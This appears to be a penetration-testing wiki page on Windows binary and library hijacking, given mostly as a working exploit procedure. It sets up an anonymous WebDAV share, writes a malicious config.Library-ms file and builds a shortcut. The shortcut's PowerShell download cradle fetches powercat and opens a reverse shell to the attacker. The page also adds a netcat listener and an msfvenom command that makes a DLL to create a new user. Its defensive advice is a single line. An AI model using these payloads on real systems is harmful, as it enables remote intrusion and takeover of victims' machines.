Binary Hijacking
Table of contents
Vulnerability
Binary (.exe or .dll) Hijacking is a way of tricking a targeted system by implenting a custom binary, either an executable or a binary. This page will explain how to forge your own Windows library with a custom payload and to execute it on your targeted computer to gain an access to it.
Prerequisites
- Find a way to make your custom library executed on the target (by doing Phishing or Binary Hijacking for example).
- Find an hijackable library with
WinPEAS
orPowerSploit
functions like Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll.
Exploit
First, run a WebDAV share on your Kali environement.
# Install wsgidav.
pip3 install wsgidav
apt install python3-wsgidav
# Create a directory to use as the WebDAV share.
mkdir -p $HOME/webdav
# Run wsgidav.
wsgidav --host=0.0.0.0 --port=$port --auth=anonymous --root $HOME/webdav/
Then, create a custom Windows Library named config.Library-ms
. Running this Windows Library will open previous WebDAV share in Windows Explorer.
<?xml version="1.0" encoding="UTF-8"?>
<!-- DO NOT MODIFY! -->
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"></libraryDescription>
<!-- DO NOT MODIFY! -->
<name>@windows.storage.dll,-34582</name>
<!-- Put whatever number you want -->
<version>6</version>
<!-- Pin to the navigation pane in Windows Explorer -->
<isLibraryPinned>true</isLibraryPinned>
<!-- Icon used to display the library (-1002 for Documents, -1003 for Pictures) -->
<iconReference>imageres.dll,-1003</iconReference>
<!-- Tags that will appear in Windows Explorer (Documents GUID below) -->
<!-- https://learn.microsoft.com/en-us/windows/win32/shell/schema-library-foldertype -->
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<!-- Put the URL of the WebDAV share -->
<url>http://$host:$port</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
In the WebDAV share, we’ll create a .Ink
shortcut for the target to execute:
- On Windows, right-click on the Desktop.
- Click on New then on Shortcut.
- In the Create Shortcut window, put following payload.
# This is an example, you can do whatever you want here.
IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c $lhost -p $lport -e powershell
- Give a name to the shortcut and click **Finish**.
- Put the shortcut in the WebDAV share and make it executed by your target!
- Do not forget to open your
netcat
listener.
nc -nlvp $lport
If you know your library will be execute with administration rights, you can directly create a new user on the machine using msfvenom
.
msfvenom -p windows/adduser USER=$username PASS=$password -f dll -o $library.dll
Recommendations
- Nothing to do here, simply enforce EDR on computers to detect and block anormal behavior.